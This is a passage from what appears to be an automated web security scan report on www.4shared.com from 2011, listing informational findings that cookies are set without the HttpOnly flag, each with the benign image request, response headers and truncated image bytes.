GIF89a...........TT...i.i.............++.FF...OOO...L.L.......X.....x.Y\Z4.4B.B...mmm...r.s.44....j.ttu...Z.Y.;;...cgbR.RJIGzzz..E.TTT{.{...{.{a.`.::.]].EE.........\.\.??O.Ow.wy.y...T.T...,.,.......
...[SNIP]...

6.105. http://www.4shared.com/images/icons/flags/lk.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/lk.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/lk.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:56 GMT; Path=/
Set-Cookie: hostid=654594557; Expires=Mon, 26-Jul-2021 13:59:56 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:56 GMT
ETag: W/"377-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 377
Date: Fri, 29 Jul 2011 13:59:55 GMT

GIF89a.........X..K....fP..H..$..G.<Sp.h....Lf\.\..#.5I..P..5..d.e2.Zl..>..C.x$L.H..=.4:..B.yt.E\.o...,..DU.T..3.ct.Rf.YT.....T.-B..e..8.A<..r..[..PD.D..@Q.O..T..gf.e..6.{;....NO..k.PJ.R].....,.....T.
...[SNIP]...

6.106. http://www.4shared.com/images/icons/flags/lt.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/lt.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/lt.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:57 GMT; Path=/
Set-Cookie: hostid=1436790188; Expires=Mon, 26-Jul-2021 13:59:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:57 GMT
ETag: W/"362-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 362
Date: Fri, 29 Jul 2011 13:59:57 GMT

GIF89a.........T..H.....d.**.TTC.C3.3..6.FFU.U.........r.s.J.J<.<.J7........{........E.*...U.ab..;..s..k........U.==.YG.;'..].;;.3..11%.%*.+.{.O.O..dw....h.3.....R?.....M . ....._......44.....^.D1.
...[SNIP]...

6.107. http://www.4shared.com/images/icons/flags/lu.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/lu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/lu.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:57 GMT; Path=/
Set-Cookie: hostid=78160760; Expires=Mon, 26-Jul-2021 13:59:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:57 GMT
ETag: W/"368-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 368
Date: Fri, 29 Jul 2011 13:59:57 GMT

GIF89a.......................(.J...Y........|u..........mfT.........um.......j..D.]........s...d\............z..l..e.....9....|....w.\..b...J..=.........B.....`...7-h............]T...................
...[SNIP]...

6.108. http://www.4shared.com/images/icons/flags/ly.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/ly.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/ly.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:57 GMT; Path=/
Set-Cookie: hostid=889952499; Expires=Mon, 26-Jul-2021 13:59:57 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:57 GMT
ETag: W/"362-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 362
Date: Fri, 29 Jul 2011 13:59:56 GMT

GIF89a..........Y.Y......F.FG.GA.A.t.z.z...e.e.[.K.KP.Pr.rn.n.e.a.aQ.Q%.%M.M0.0:.:a.a.R.U.U....E..L.N.NW.W5.5~.~j.jA.A . =.=7.79.9/./+.+].]*.*.m..{.<.<?.?...^.^v.vI.IS.Sh.hY.YD.CU.U...;.;5.67.7I.IK.K]
...[SNIP]...

6.109. http://www.4shared.com/images/icons/flags/mx.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/mx.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/mx.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:59 GMT; Path=/
Set-Cookie: hostid=314688334; Expires=Mon, 26-Jul-2021 13:59:59 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:59 GMT
ETag: W/"366-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 366
Date: Fri, 29 Jul 2011 13:59:59 GMT

GIF89a........jnU.tz...5;.[.K.l.GK.............1.....DI......d........s...=B./5.X[......`.}.L........)/.........\.z....`............._?..........}j.OS.`d...................JO...<.`.........B.d...h..n
...[SNIP]...

6.110. http://www.4shared.com/images/icons/flags/my.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/my.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/my.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:03 GMT; Path=/
Set-Cookie: hostid=-1262335297; Expires=Mon, 26-Jul-2021 14:00:03 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:03 GMT
ETag: W/"375-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 375
Date: Fri, 29 Jul 2011 14:00:03 GMT

GIF89a....................ST.DD........}.;;.os.$$.33...GG...........LM....EM.......MW.............9C.............,,......LK......%.wK............mm.wu......................;;...............~..........
...[SNIP]...

6.111. http://www.4shared.com/images/icons/flags/nl.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/nl.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/nl.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:02 GMT; Path=/
Set-Cookie: hostid=-572108; Expires=Mon, 26-Jul-2021 14:00:02 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:02 GMT
ETag: W/"360-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 360
Date: Fri, 29 Jul 2011 14:00:01 GMT

GIF89a.........t...4n..!..bs.X.................z.Z...]kE{.:r.*f....d...BQ.Td.u...G.z...Y...!`.Bw.Q.K...<P..T../j.....<M.......jz.1B.7G>v..LZ.Vj.Zn..1.Wh.Ygw......j..,<....P_...m~.HW....p...........
...[SNIP]...

6.112. http://www.4shared.com/images/icons/flags/no.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/flags/no.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/flags/no.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:03 GMT; Path=/
Set-Cookie: hostid=-804005107; Expires=Mon, 26-Jul-2021 14:00:03 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:03 GMT
ETag: W/"376-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 376
Date: Fri, 29 Jul 2011 14:00:03 GMT

GIF89a..........e......da....mk.|z....V.....1/z.........-+.MK.^\..........TR....DC....EC.LJk.....o...'$.?=.:7.IG.52.!........41w......75W..]...ZW....;9.PN.IF.hfN....,.a_.@=.rq...~..s...)&.............
...[SNIP]...

6.113. http://www.4shared.com/images/icons/misc/ok.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/icons/misc/ok.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/icons/misc/ok.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:03:02 GMT; Path=/
Set-Cookie: hostid=1998746579; Expires=Mon, 26-Jul-2021 14:03:02 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:03:02 GMT
ETag: W/"510-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 510
Date: Fri, 29 Jul 2011 14:03:01 GMT

GIF89a.....@.t..t..~.._..)../{/].._..x..v...z.}..>.>Z..).)Y..x..{....I^...|.g.g.i.s.%e.ev....)...u..{....NO.O!..7.4w..w..$z.K..u..!.!%.%!z._._...w..m.(Z..V.VO.Of..D.D_..#y.}..J.I..Y_..*..'|.c.h....Qx
...[SNIP]...

6.114. http://www.4shared.com/images/images/icossl.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/images/icossl.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/images/icossl.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:02:40 GMT; Path=/
Set-Cookie: hostid=-1635750364; Expires=Mon, 26-Jul-2021 14:02:40 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:02:40 GMT
ETag: W/"793-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 793
Date: Fri, 29 Jul 2011 14:02:40 GMT

GIF89aA......... ~....*........0...j.&.....p.....r.`..P.....@...{..y.......J..Q.....i........0..~..a..........................).................H..'.....N...l..o.?........?........4..H..`........3...
...[SNIP]...

6.115. http://www.4shared.com/images/index-premium-features.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/index-premium-features.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/index-premium-features.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:25 GMT; Path=/
Set-Cookie: hostid=2020542788; Expires=Mon, 26-Jul-2021 13:59:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:25 GMT
ETag: W/"3727-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/png
Content-Length: 3727
Date: Fri, 29 Jul 2011 13:59:24 GMT

.PNG
.
...IHDR.......$......Q((....tEXtSoftware.Adobe ImageReadyq.e<...1IDATx..]yl......z./.c...9.MB.....T..&.S....B+.QST.6.)..&.HE...z....
)..B..C.    ..1.pbl.cl....z....o<;.;;.^{wA..h5........{...z.
...[SNIP]...

6.116. http://www.4shared.com/images/logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:41 GMT; Path=/
Set-Cookie: hostid=1860872067; Expires=Mon, 26-Jul-2021 13:59:41 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:41 GMT
ETag: W/"3348-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 3348
Date: Fri, 29 Jul 2011 13:59:41 GMT

GIF89aF.,............mnpxx{dfi{|...zz}QRU......rruWX\...bdf...wx{...ppsnnqTUYklo.........WX[......}~.~~.MNQ...............jjn...||VWZ...ghk\]`...ttw...ghjijm...`bevvyXZ]......cdg[\`.........tvy....
...[SNIP]...

6.117. http://www.4shared.com/images/logol.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/logol.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logol.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:07:53 GMT; Path=/
Set-Cookie: hostid=134585241; Expires=Mon, 26-Jul-2021 14:07:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:07:53 GMT
ETag: W/"4861-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 4861
Date: Fri, 29 Jul 2011 14:07:53 GMT

GIF89aU.A..........tuxyz}dehstwnor...klomnqijmvwzrsv...~.ppscdgwx{LMQxy|...TUX|}.efiz{~jkn}~.ghkxxzops...~~....rruVW[lmp...abfVWZuvyrrvqru......bcfabdQRV{|~nnpRSVghl\]`lln......_`bopt||~WX\...`adzz|.
...[SNIP]...

6.118. http://www.4shared.com/images/menu.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/menu.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menu.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:05 GMT; Path=/
Set-Cookie: hostid=18766071; Expires=Mon, 26-Jul-2021 14:08:05 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:05 GMT
ETag: W/"1657-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 1657
Date: Fri, 29 Jul 2011 14:08:04 GMT

GIF89a.........qqq.....................................................................................................................................................................................
...[SNIP]...

6.119. http://www.4shared.com/images/menuOver.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/menuOver.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menuOver.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:20 GMT; Path=/
Set-Cookie: hostid=243671667; Expires=Mon, 26-Jul-2021 14:08:20 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:20 GMT
ETag: W/"2019-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 2019
Date: Fri, 29 Jul 2011 14:08:19 GMT

GIF89a..........qqq....................................................................................................................................................................................
...[SNIP]...

6.120. http://www.4shared.com/images/menuSel.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/menuSel.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menuSel.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:54 GMT; Path=/
Set-Cookie: hostid=194628574; Expires=Mon, 26-Jul-2021 14:09:54 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:54 GMT
ETag: W/"2085-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 2085
Date: Fri, 29 Jul 2011 14:09:54 GMT

GIF89a.......qqq.......................................................................................................................................................................................
...[SNIP]...

6.121. http://www.4shared.com/images/menutabs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/menutabs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/menutabs.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:09:58 GMT; Path=/
Set-Cookie: hostid=-2111948687; Expires=Mon, 26-Jul-2021 14:09:58 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:58 GMT
ETag: W/"5512-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 5512
Date: Fri, 29 Jul 2011 14:09:57 GMT

GIF89a..d.........qqq..................................................................................................................................................................................
...[SNIP]...

6.122. http://www.4shared.com/images/mobile/nokia_e51_thumb.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/mobile/nokia_e51_thumb.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/nokia_e51_thumb.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:23 GMT; Path=/
Set-Cookie: hostid=622488398; Expires=Mon, 26-Jul-2021 14:00:23 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:23 GMT
ETag: W/"3648-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/png
Content-Length: 3648
Date: Fri, 29 Jul 2011 14:00:23 GMT

.PNG
.
...IHDR...F...F.....q.......tEXtSoftware.Adobe ImageReadyq.e<...IDATx..\kl.W..........q.v..qB.8mpS......%T
( P[...    ...D......HTUK.VB.Di..M..Fm..&i....o..........p.].I....V....;;/.~s...s...l.
...[SNIP]...

6.123. http://www.4shared.com/images/mobile/nokia_e63_thumb.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/mobile/nokia_e63_thumb.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/mobile/nokia_e63_thumb.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:00:23 GMT; Path=/
Set-Cookie: hostid=-549637998; Expires=Mon, 26-Jul-2021 14:00:23 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:00:23 GMT
ETag: W/"4760-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/png
Content-Length: 4760
Date: Fri, 29 Jul 2011 14:00:23 GMT

.PNG
.
...IHDR...F...F.....q.......tEXtSoftware.Adobe ImageReadyq.e<...:IDATx..\i.\.u.....z....U3#....hAh4.,..9..@H
....`6.2f5...\..I...r."P.S..e.#(.....".>...}.......so.H#.HJ.*..]U.{......=.;.9.>.
...[SNIP]...

6.124. http://www.4shared.com/images/mobile/nokia_e66_thumb.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/mobile/nokia_e66_thumb.png

Issue detail

